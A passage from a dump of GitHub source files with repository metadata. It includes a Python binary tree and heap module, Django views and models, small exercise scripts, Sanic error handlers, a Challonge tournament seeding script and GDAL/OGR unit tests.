len(x)\n rootNode = Node(x[0])\n nodeList = [rootNode]\n tmp = 1\n for i in range(0, depth):\n newNodeList = []\n upBound = 2*i\n if(upBound == 0):\n upBound = 1\n for j in range(upBound):\n if(tmp > n-1):\n break\n nodeList[j].insertLeft(Node(x[tmp]))\n tmp += 1\n if(tmp > n-1):\n break\n nodeList[j].insertRight(Node(x[tmp]))\n tmp += 1\n newNodeList.append( nodeList[j].left)\n newNodeList.append( nodeList[j].right)\n nodeList = newNodeList\n return rootNode\n\ndef treeToArray(rootNode = Node(0), depth = 0):\n nodeList = [rootNode]\n arrayResult = [rootNode.key]\n for i in range(0, depth):\n newNodeList = []\n upBound = 2*i\n if(upBound == 0):\n upBound = 1\n for j in range(upBound):\n if(nodeList[j].left != None):\n arrayResult.append(nodeList[j].left.key)\n if(nodeList[j].right != None):\n arrayResult.append(nodeList[j].right.key)\n newNodeList.append( nodeList[j].left)\n newNodeList.append( nodeList[j].right)\n nodeList = newNodeList\n return arrayResult\n\ndef generateHeap(depth, x):\n n = len(x)\n rootNode = Node(x[0])\n nodeList = [rootNode]\n tmp = 1\n for i in range(0, 
depth):\n newNodeList = []\n upBound = 2**i #same fix as above: level i holds 2**i nodes\n for j in range(upBound):\n if(tmp > n-1):\n break\n nodeList[j].insertLeft(Node(x[tmp]))\n heapingNode(nodeList[j].left)\n tmp += 1\n if(tmp > n-1):\n break\n nodeList[j].insertRight(Node(x[tmp]))\n heapingNode(nodeList[j].right)\n tmp += 1\n newNodeList.append( nodeList[j].left)\n newNodeList.append( nodeList[j].right)\n nodeList = newNodeList\n return rootNode\n\ndef heapingNode(node):\n while(node.parent != None):\n if(node.key > node.parent.key):\n tmp = node.key\n node.key = node.parent.key\n node.parent.key = tmp\n node = node.parent\n else:\n break\n","repo_name":"hongvo2308/learning","sub_path":"Algorithms/searching/binary_tree/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7596720686","text":"from django.shortcuts import render, redirect\nfrom django import views\nfrom books.models import Book, Author, Collection, Editor, Overdue, Category\nfrom libraries.models import Library, Bookseller\nfrom books.forms import AddBookForm, AddAuthorForm, AddCategoryForm, AddCollectionForm, AddEditorForm\n\ndef book_index(request):\n overdues = Overdue.objects.all()\n\n context = {\n 'overdues': overdues\n }\n return render(request, 'book/index.html', context)\n\ndef detail_book(request, id):\n book = Book.objects.get(id=id)\n libraries = Library.objects.filter(overdue__book=id, overdue__status='Disponible')\n\n context = {\n 'book': book,\n 'libraries': libraries,\n }\n\n if request.user.is_authenticated:\n if request.user.is_staff:\n bookseller = Bookseller.objects.get(user=request.user)\n library = Library.objects.get(id=bookseller.library.id)\n overdues = Overdue.objects.filter(book=id, library=library.id)\n\n context = {\n 'book': book,\n 'libraries': libraries,\n 'library': library,\n 'bookseller': bookseller,\n 'overdues': overdues,\n }\n\n return render(request, 'book/detail_book.html', context)\n\n return render(request, 'book/detail_book.html', context)\n\ndef author_index(request):\n form = AddAuthorForm()\n authors = Author.objects.all()\n if request.method == 'POST':\n name = request.POST['name']\n author = Author(name=name)\n author.save()\n return redirect('books:authors')\n context = {\n 'form': form,\n 'authors': authors\n }\n return render(request, 'author/index.html', context)\n\ndef editor_index(request):\n form = AddEditorForm()\n editors = Editor.objects.all()\n if request.method == 'POST':\n name = request.POST['name']\n editor = Editor(name=name)\n editor.save()\n return redirect('books:editors')\n context = {\n 'form': form,\n 'editors': editors\n }\n return render(request, 'editor/index.html', context)\n\ndef collection_index(request):\n form = AddCollectionForm()\n collections = Collection.objects.all()\n if request.method == 'POST':\n name = request.POST['name']\n collection = Collection(name=name)\n collection.save()\n return redirect('books:collections')\n context = {\n 'form': form,\n 'collections': collections\n }\n return render(request, 'collection/index.html', context)\n\ndef category_index(request):\n form = AddCategoryForm()\n categories = Category.objects.all()\n if request.method == 'POST':\n name = request.POST['name']\n category = Category(name=name)\n category.save()\n return redirect('books:categories')\n context = {\n 'form': form,\n 'categories': categories\n }\n return render(request, 
'category/index.html', context)","repo_name":"louispelarrey/library-django","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23853020212","text":"import random\r\nplay = True\r\nwhile play:\r\n sides = int(input(\"\\nHow many sides does your die have? (max 10)\\n\\n\"))\r\n dices = int(input(\"\\nHow many dice do you want to roll?\\n\\n\"))\r\n times = int(input(\"\\nHow many times do you want to repeat it?\\n\\n\"))\r\n s1 = 0\r\n s2 = 0\r\n s3 = 0\r\n s4 = 0\r\n s5 = 0\r\n s6 = 0\r\n s7 = 0\r\n s8 = 0\r\n s9 = 0\r\n s0 = 0\r\n for x in range(0,times):\r\n for y in range(0,dices):\r\n roll = random.randint(1,sides)\r\n if roll == 1: s1 = s1+1\r\n if roll == 2: s2 = s2+1\r\n if roll == 3: s3 = s3+1\r\n if roll == 4: s4 = s4+1\r\n if roll == 5: s5 = s5+1\r\n if roll == 6: s6 = s6+1\r\n if roll == 7: s7 = s7+1\r\n if roll == 8: s8 = s8+1\r\n if roll == 9: s9 = s9+1\r\n if roll == 10: s0 = s0+1\r\n print(\"\\nYour rolls:\\n1: \" + str(s1) + \"\\n2: \" + str(s2) + \"\\n3: \" + str(s3) + \"\\n4: \" + str(s4) + \"\\n5: \" + str(s5) + \"\\n6: \" + str(s6) + \"\\n7: \" + str(s7) + \"\\n8: \" + str(s8) + \"\\n9: \" + str(s9) + \"\\n10: \" + str(s0) + \"\\n\\n\")\r\n z = str(input(\"\\nDo you want to try again? (y/n)\\n\\n\"))\r\n if z == \"y\": play = True\r\n if z == \"n\": play = False\r\n","repo_name":"KerimcanUzar/probability-simulator","sub_path":"Probability_Simulator.py","file_name":"Probability_Simulator.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14929878689","text":"import random\nprint(\"Welcome to the coding/decoding centre\\nHere you can encode your sentence and decode it too!!!\")\ncode = str(input(\"Enter your sentence : \"))\n\nwords = code.split(\" \")\nselect = int(input(\"Enter 1 for coding and 2 for decoding : \"))\nif select == 1:\n\tcoding = True\nelse:\n\tcoding = False\nif (coding):\n\tnewwords = []\n\tfor word in words:\n\t\tif len(word) >= 3:\n\t\t\tchars = \"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM\"\n\t\t\t\n\t\t\tr1 = \"\"\n\t\t\tr2 = \"\"\n\t\t\tfor a in range(3):\n\t\t\t\tr1+=random.choice(chars)\n\t\t\tfor a in range(3):\n\t\t\t\tr2+=random.choice(chars)\n\t\t\tcoded = r1 + word[1 : ] + word[0] + r2\n\t\t\tnewwords.append(coded)\n\t\telse:\n\t\t\tnewwords.append(word[::-1])\n\tprint(\" \".join(newwords))\n\t\t\nelse:\n\tnewwords = []\n\tfor word in words:\n\t\tif len(word) >= 3:\n\t\t\tcoded = word[3:-3]\n\t\t\tcoded = coded[-1] + coded[:-1]\n\t\t\tnewwords.append(coded)\n\t\telse:\n\t\t\tnewwords.append(word[::-1])\n\tprint(\" \".join(newwords))\n\t","repo_name":"Kavy47/Codeanddecode.py","sub_path":"secret_code.py","file_name":"secret_code.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29379431579","text":"secadn = input(\"Enter a DNA sequence: \")\nn = int(input(\"Enter the length: \"))\nsubadn = []\nsubadnfinal = []\nposicionesrepetidas = []\n\nfor i in range(len(secadn)):\n if (i+n) > len(secadn):\n break\n \n subadn.append(secadn[i:i+n])\n\nfor i in range (len(subadn)): #0 1 2 3 \n for j in range (len(subadn)): # 0 1 2 3 , j = vector\n if (i == (len(subadn)-1)-j):\n break\n \n if (subadn[i] == subadn[(len(subadn)-1)-j]):\n posicionesrepetidas.append(i)\n 
posicionesrepetidas.append((len(subadn)-1)-j) #append the index of the matching substring (j-based), not i\n\nfor i in range (len(subadn)):\n salto = False\n for j in (posicionesrepetidas):\n if (i == j):\n salto = True\n break\n if (salto):\n continue\n \n else:\n subadnfinal.append(subadn[i])\n\nif (len(subadnfinal) == 0):\n print(\"none\")\n \nif (len(subadnfinal) != 0):\n for i in (subadnfinal):\n print(i)\n\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej3/hito2_ej3_23b79c6635b1f7ed7094fe3d3084056e.py","file_name":"hito2_ej3_23b79c6635b1f7ed7094fe3d3084056e.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"ceb","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26436455909","text":"from sanic.exceptions import ServerError, NotFound, SanicException\nfrom sanic import response as res\nfrom app import app\nimport logging\nimport datetime\n\nlog = logging.getLogger()\n\n\n@app.exception(NotFound)\nasync def ignore_404(request, exception):\n now = datetime.datetime.now(datetime.timezone.utc)\n strfz = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n log.error(\"[\" + strfz + \" GMT ] \" + str(exception) +\n \" [\" + str(exception.status_code) + \"]\")\n\n return res.redirect(\"http://dscvit.com\")\n\n\n@app.exception(ServerError)\nasync def handle_server_exception(request, exception):\n print(\"Inside server error\")\n now = datetime.datetime.now(datetime.timezone.utc)\n strfz = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n log.error(\"[\" + strfz + \" GMT ] \" + str(exception) +\n \" [\" + str(exception.status_code) + \"]\")\n return res.redirect(\"http://dscvit.com\")\n\n\n@app.exception(SanicException)\nasync def custom_exception(request, exception):\n print(\"Inside Sanic exception \")\n if exception.status_code == 215:\n #the HTTP status is set via the status argument below; assigning to the response module does nothing\n return res.json({\n \"error\": \"Unauthorized\",\n \"status_code\": 215\n }, status=400)\n\n elif exception.status_code == 216:\n return res.json({\n 'error': str(exception),\n 'status_code': 216\n }, status=400)\n\n elif exception.status_code == 217:\n now = datetime.datetime.now(datetime.timezone.utc)\n strfz = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n log.error(\"[\" + strfz + \" GMT ] \" + str(exception) +\n \" [\" + str(exception.status_code) + \"]\")\n return res.json({\n 'message': 'Unauthorized',\n 'status_code': 400\n }, status=400)\n\n now = datetime.datetime.now(datetime.timezone.utc)\n strfz = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n log.error(\"[\" + strfz + \" GMT ] \" + str(exception) +\n \" [\" + str(exception.status_code) + \"]\")\n return res.redirect(\"http://dscvit.com\")\n","repo_name":"Souldiv/Campaign-Sanic-Server","sub_path":"exceptions/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71867808570","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndataset = pd.read_csv('diabetes.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 8].values\n\nX = pd.DataFrame(X)\ny = pd.DataFrame(y)\n\nX.isna().sum() # No null values\n\n\n\nX.columns = ['Pregnancies', 'Glucose', 'BloodPressure', 'SkinThickness', 'Insulin', 'BMI', 'DiabetesPedigreeFunction', 'Age']\ny.columns = ['Outcome']\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\n\n# Exploring the 
Data\nplt.figure(figsize=(18, 8))\n\nfor i, column in enumerate(X.columns):\n plt.subplot(2, 4, i+1)\n sns.distplot(X[column])\n plt.title(f\"Distribution of {column}.\")\n\nplt.tight_layout()\nplt.show()","repo_name":"diop/diabetes-diagnosis-aid","sub_path":"diagnosis.py","file_name":"diagnosis.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1929832186","text":"import os\nimport os.path\nimport signal\nimport contextlib\nimport time\nimport threading\n\n\nclass WatchAlarm(Exception): pass\n\n\n_STOPPED = object()\n_STARTED = object()\n_ENABLED = object()\n\n\nclass BaseWatch(object):\n\n def __init__(self, path):\n self.path = os.path.abspath(path)\n self._state = _STOPPED\n self._changed = False\n self._old_signal_handler = None\n\n @contextlib.contextmanager\n def alarm(self):\n assert self._state is _STARTED, \"not started\"\n self._state = _ENABLED\n try:\n yield\n finally:\n assert self._state is _ENABLED, \"not enabled\"\n self._state = _STARTED\n\n def start(self):\n assert self._state is _STOPPED, \"already started\"\n self._state = _STARTED\n self._old_signal_handler = signal.getsignal(signal.SIGALRM)\n signal.signal(signal.SIGALRM, self._signal_handler)\n self._start()\n\n def stop(self):\n assert self._state is _STARTED, \"already stopped\"\n self._stop()\n signal.signal(signal.SIGALRM, self._old_signal_handler)\n self._old_signal_handler = None\n self._state = _STOPPED\n\n @property\n def changed(self):\n rv = self._changed\n self._changed = False\n return rv\n\n def _start(self):\n raise NotImplementedError\n\n def _stop(self):\n raise NotImplementedError\n\n def _alarm(self):\n if self._state is _ENABLED:\n self._changed = True\n os.kill(os.getpid(), signal.SIGALRM)\n elif self._state is _STARTED:\n self._changed = True\n else:\n assert False, \"not started\"\n\n @staticmethod\n def _signal_handler(signum, frame):\n raise WatchAlarm\n\n def __enter__(self):\n self.start()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.stop()\n return False\n\n\nclass StatWatch(BaseWatch):\n\n def __init__(self, *args, **kwargs):\n super(StatWatch, self).__init__(*args, **kwargs)\n self._done = True\n self._mtime = None\n self._thread = None\n\n def _target(self):\n while not self._done:\n mtime = os.stat(self.path).st_mtime\n if self._mtime is None:\n self._mtime = mtime\n continue\n elif mtime > self._mtime:\n self._mtime = mtime\n self._alarm()\n time.sleep(.1)\n\n def _start(self):\n self._done = False\n self._thread = threading.Thread(target=self._target)\n self._thread.start()\n\n def _stop(self):\n self._done = True\n self._thread.join()\n self._mtime = None\n self._thread = None\n\n\nwatch_file = StatWatch\n\n","repo_name":"lemon24/intercessor","sub_path":"intercessor/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34561388393","text":"import json\nimport challonge \nimport gspread\n\n# Challonge setup\nchallonge_credentials = json.load(open(\"challonge_credentials.json\"))\nchallonge.set_credentials(challonge_credentials[\"username\"], challonge_credentials[\"private_key\"])\n\n# Google Sheets setup\nsheet_details = json.load(open(\"sheet_details.json\"))\nsa = gspread.service_account(filename=\"credentials.json\")\nsh = sa.open(sheet_details[\"sheet_name\"])\n\nelo_ws = 
sh.worksheet(sheet_details[\"elo_worksheet\"])\nelo_list = elo_ws.get_all_records()\n\nnames_ws = sh.worksheet(sheet_details[\"player_names_worksheet\"])\nnames_list = names_ws.get_all_records()\n\n# Build dictionaries to access ELO by displayed player name\nelo_dict = {}\nnames_dict = {}\n\nfor player in elo_list :\n elo_dict[player[\"Player Name\"]] = player[\"ELO Score\"]\nfor player in names_list :\n names_dict[player[\"Challonge_ID\"]] = player[\"Player_Name\"]\n\nuser_input = input(\"Enter tournament ID (e.g. 10230) or URL (e.g. 'single_elim' for challonge.com/single_elim). If assigned to a subdomain, URL format must be :subdomain-:tournament_url (e.g. 'test-mytourney' for test.challonge.com/mytourney)\\n\"\n \"You can enter extra options after tournament ID to restrict seeding e.g. top-8 if you want to only seed the 8 highest rated players.\\n\")\ntournament = challonge.tournaments.show(user_input.split(\" \")[0])\n\n# Retrieve the participants\nparticipants = challonge.participants.index(tournament[\"id\"])\n\nprint(\"Preparing to update tournament seeding, there are currently\", len(participants),\"players entered in the tournament\")\n\n# Create a dictionary to match challonge user id with tournament user id\n# Create a dictionary to match tournament user name with tournament user id\nchallonge_user_id_dict = {}\nchallonge_user_input_dict = {}\n\nfor p in participants :\n challonge_user_id_dict[p[\"id\"]] = p[\"challonge_user_id\"]\n challonge_user_input_dict[p[\"id\"]] = p[\"name\"]\n\nelo_user_list = []\n\nfor id in challonge_user_id_dict :\n challonge_id = challonge_user_id_dict[id]\n player_name = names_dict.get(challonge_id)\n sheet_elo = elo_dict.get(player_name)\n player_elo = sheet_details[\"unseeded_elo_value\"]\n if sheet_elo :\n player_elo = sheet_elo\n elo_user_list.append({\"id\": id, \n \"elo\": player_elo, \n \"ELO_name\": player_name, \n \"name\": challonge_user_input_dict[id]})\n\ndef eloSort(entry) :\n return entry[\"elo\"]\nelo_user_list.sort(key=eloSort)\n\ndef seedValid(nb_entrants, seed, user_input) :\n if (len(user_input.split(\" \")) > 1) :\n criteria = user_input.split(\" \")[1].split(\"-\")\n if (criteria[0] == \"top\") :\n return seed <= int(criteria[1])\n elif (criteria[0] == \"bottom\") :\n return seed >= nb_entrants - int(criteria[1]) + 1\n return True\n\nfor i in range(0, len(elo_user_list)) :\n if seedValid(len(elo_user_list), len(elo_user_list)-i, user_input) :\n print(\"User\", elo_user_list[i], \"is being seeded\", (len(elo_user_list) - i))\n challonge.participants.update(tournament[\"id\"], elo_user_list[i][\"id\"], \n name=elo_user_list[i][\"name\"], \n seed=(len(elo_user_list) - i))","repo_name":"GSabelette/bnuy-elo","sub_path":"bnuy-seed.py","file_name":"bnuy-seed.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43775039162","text":"# Given a string s, find the length of the longest substring without repeating characters.\n\nclass Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if len(s) == 1:\n return 1\n longest = \"\"\n substr = \"\"\n for letter in s:\n findidx = substr.find(letter)\n if findidx == -1:\n substr = substr + letter\n else: \n if len(substr) > 
len(longest):\n longest = substr\n substr = substr + letter\n substr = substr[findidx+1:]\n \n if len(substr) > len(longest):\n longest = substr\n return len(longest)\n\n \n \n \n \n ","repo_name":"shilpavijay/Algorithms-Problems-Techniques","sub_path":"Puzzles/LongestSubstr.py","file_name":"LongestSubstr.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12924991981","text":"from django.db import models\nfrom datetime import datetime\n\nclass TVShowManager(models.Manager):\n def basic_validator(self, postData):\n errors = {}\n if len(postData['title']) < 1:\n errors[\"title\"] = \"Title cannot be blank\"\n if len(postData['network']) < 1:\n errors[\"network\"] = \"Network cannot be blank\"\n if len(postData['rel_date']) < 1:\n errors[\"rel_date\"] = \"Release Date cannot be blank\"\n else:\n d1 = datetime.strptime(postData['rel_date'], \"%Y-%m-%d\").date()\n if d1 > datetime.now().date():\n print(\"greater than today\")\n errors[\"future_rel_date\"] = \"Release Date must today or in the past\"\n if len(postData['desc']) > 0 and len(postData['desc']) < 10:\n errors[\"desc\"] = \"Description must be longer than 10 characters if present\"\n return errors\n\nclass Show(models.Model):\n title = models.CharField(max_length=100)\n network = models.CharField(max_length=50)\n release_date = models.DateField()\n description = models.TextField(blank=True)\n objects = TVShowManager()\n\n def __repr__(self):\n return f\"Title: {self.title}, Network: {self.network}, Released: {self.release_date}, Description: {self.description}\"\n","repo_name":"mary-milburn-pearce/first_django","sub_path":"apps/tv/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12324315050","text":"import os\nimport sys\n\nsys.path.append( '../pymod' )\n\nimport gdaltest\nimport ogrtest\nfrom osgeo import gdal\nfrom osgeo import ogr\n\n###############################################################################\n\ndef ogr_basic_1():\n\n gdaltest.ds = ogr.Open( 'data/poly.shp' )\n\n if gdaltest.ds is not None:\n return 'success'\n else:\n return 'fail'\n\n###############################################################################\n# Test Feature counting.\n\ndef ogr_basic_2():\n\n gdaltest.lyr = gdaltest.ds.GetLayerByName( 'poly' )\n\n if gdaltest.lyr.GetName() != 'poly':\n return 'fail'\n if gdaltest.lyr.GetGeomType() != ogr.wkbPolygon:\n return 'fail'\n\n if gdaltest.lyr.GetLayerDefn().GetName() != 'poly':\n return 'fail'\n if gdaltest.lyr.GetLayerDefn().GetGeomType() != ogr.wkbPolygon:\n return 'fail'\n\n count = gdaltest.lyr.GetFeatureCount()\n if count != 10:\n gdaltest.post_reason( 'Got wrong count with GetFeatureCount() - %d, expecting 10' % count )\n return 'fail'\n\n # Now actually iterate through counting the features and ensure they agree.\n gdaltest.lyr.ResetReading()\n\n count2 = 0\n feat = gdaltest.lyr.GetNextFeature()\n while feat is not None:\n count2 = count2 + 1\n feat = gdaltest.lyr.GetNextFeature()\n\n if count2 != 10:\n gdaltest.post_reason( 'Got wrong count with GetNextFeature() - %d, expecting 10' % count2 )\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test Spatial Query.\n\ndef ogr_basic_3():\n\n minx = 479405\n miny = 4762826\n maxx = 480732\n maxy = 4763590\n\n 
###########################################################################\n # Create query geometry.\n\n ring = ogr.Geometry( type = ogr.wkbLinearRing )\n ring.AddPoint( minx, miny )\n ring.AddPoint( maxx, miny )\n ring.AddPoint( maxx, maxy )\n ring.AddPoint( minx, maxy )\n ring.AddPoint( minx, miny )\n\n poly = ogr.Geometry( type = ogr.wkbPolygon )\n poly.AddGeometryDirectly( ring )\n\n gdaltest.lyr.SetSpatialFilter( poly )\n gdaltest.lyr.SetSpatialFilter( gdaltest.lyr.GetSpatialFilter() )\n gdaltest.lyr.ResetReading()\n\n count = gdaltest.lyr.GetFeatureCount()\n if count != 1:\n gdaltest.post_reason( 'Got wrong feature count with spatial filter, expected 1, got %d' % count )\n return 'fail'\n\n feat1 = gdaltest.lyr.GetNextFeature()\n feat2 = gdaltest.lyr.GetNextFeature()\n\n if feat1 is None or feat2 is not None:\n gdaltest.post_reason( 'Got too few or too many features with spatial filter.' )\n return 'fail'\n\n gdaltest.lyr.SetSpatialFilter( None )\n count = gdaltest.lyr.GetFeatureCount()\n if count != 10:\n gdaltest.post_reason( 'Clearing spatial query may not have worked properly, getting\\n%d features instead of expected 10 features.' % count )\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test GetDriver().\n\ndef ogr_basic_4():\n driver = gdaltest.ds.GetDriver()\n if driver is None:\n gdaltest.post_reason( 'GetDriver() returns None' )\n return 'fail'\n\n if driver.GetName() != 'ESRI Shapefile':\n gdaltest.post_reason( 'Got wrong driver name: ' + driver.GetName() )\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Test attribute query on special field fid - per bug 1468.\n\ndef ogr_basic_5():\n\n gdaltest.lyr.SetAttributeFilter( 'FID = 3' )\n gdaltest.lyr.ResetReading()\n\n feat1 = gdaltest.lyr.GetNextFeature()\n feat2 = gdaltest.lyr.GetNextFeature()\n\n gdaltest.lyr.SetAttributeFilter( None )\n\n if feat1 is None or feat2 is not None:\n gdaltest.post_reason( 'unexpected result count.' )\n return 'fail'\n\n if feat1.GetFID() != 3:\n gdaltest.post_reason( 'got wrong feature.' 
)\n return 'fail'\n\n return 'success'\n\n\n###############################################################################\n# Test opening a dataset with an empty string and a non existing dataset\ndef ogr_basic_6():\n\n # Put inside try/except for OG python bindings\n try:\n if ogr.Open( '' ) is not None:\n return 'fail'\n except:\n pass\n\n try:\n if ogr.Open( 'non_existing' ) is not None:\n return 'fail'\n except:\n pass\n\n return 'success'\n\n###############################################################################\n# Test ogr.Feature.Equal()\n\ndef ogr_basic_7():\n\n feat_defn = ogr.FeatureDefn()\n feat = ogr.Feature(feat_defn)\n if not feat.Equal(feat):\n return 'fail'\n\n try:\n feat.SetFieldIntegerList\n except:\n return 'skip'\n\n feat_clone = feat.Clone()\n if not feat.Equal(feat_clone):\n return 'fail'\n\n # We MUST delete now as we are changing the feature defn afterwards!\n # Crash guaranteed otherwise\n feat = None\n feat_clone = None\n\n field_defn = ogr.FieldDefn('field1', ogr.OFTInteger)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field2', ogr.OFTReal)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field3', ogr.OFTString)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field4', ogr.OFTIntegerList)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field5', ogr.OFTRealList)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field6', ogr.OFTStringList)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field7', ogr.OFTDate)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field8', ogr.OFTTime)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field9', ogr.OFTDateTime)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field10', ogr.OFTBinary)\n feat_defn.AddFieldDefn(field_defn)\n field_defn = ogr.FieldDefn('field11', ogr.OFTInteger64)\n feat_defn.AddFieldDefn(field_defn)\n\n feat = ogr.Feature(feat_defn)\n feat.SetFID(100)\n feat.SetField(0, 1)\n feat.SetField(1, 1.2)\n feat.SetField(2, \"A\")\n feat.SetFieldIntegerList(3, [1, 2])\n feat.SetFieldDoubleList(4, [1.2, 3.4])\n feat.SetFieldStringList(5, [\"A\", \"B\"])\n feat.SetField(6, 2010, 1, 8, 22, 48, 15, 4)\n feat.SetField(7, 2010, 1, 8, 22, 48, 15, 4)\n feat.SetField(8, 2010, 1, 8, 22, 48, 15, 4)\n feat.SetFieldBinaryFromHexString(9, '012345678ABCDEF')\n feat.SetField(10, 1234567890123)\n\n feat_clone = feat.Clone()\n if not feat.Equal(feat_clone):\n feat.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n geom = ogr.CreateGeometryFromWkt('POINT(0 1)')\n feat_almost_clone.SetGeometry(geom)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n geom = ogr.CreateGeometryFromWkt('POINT(0 1)')\n feat.SetGeometry(geom)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_clone = feat.Clone()\n if not feat.Equal(feat_clone):\n feat.DumpReadable()\n feat_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFID(99)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(0, 2)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n 
feat_almost_clone.SetField(1, 2.2)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(2, \"B\")\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldIntegerList(3, [1, 2, 3])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldIntegerList(3, [1, 3])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldDoubleList(4, [1.2, 3.4, 5.6])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldDoubleList(4, [1.2, 3.5])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldStringList(5, [\"A\", \"B\", \"C\"])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldStringList(5, [\"A\", \"D\"])\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n for num_field in [6, 7, 8]:\n for i in range(7):\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(num_field, 2010+(i==0), 1+(i==1),\n 8+(i==2), 22+(i==3), 48+(i==4),\n 15+(i==5), 4+(i==6))\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetFieldBinaryFromHexString(9, '00')\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n feat_almost_clone = feat.Clone()\n feat_almost_clone.SetField(10, 2)\n if feat.Equal(feat_almost_clone):\n feat.DumpReadable()\n feat_almost_clone.DumpReadable()\n return 'fail'\n\n return 'success'\n\n###############################################################################\n# Issue several RegisterAll() to check that OGR drivers are good citizens\n\ndef ogr_basic_8():\n\n ogr.RegisterAll()\n ogr.RegisterAll()\n ogr.RegisterAll()\n\n return 'success'\n\n###############################################################################\n# Test 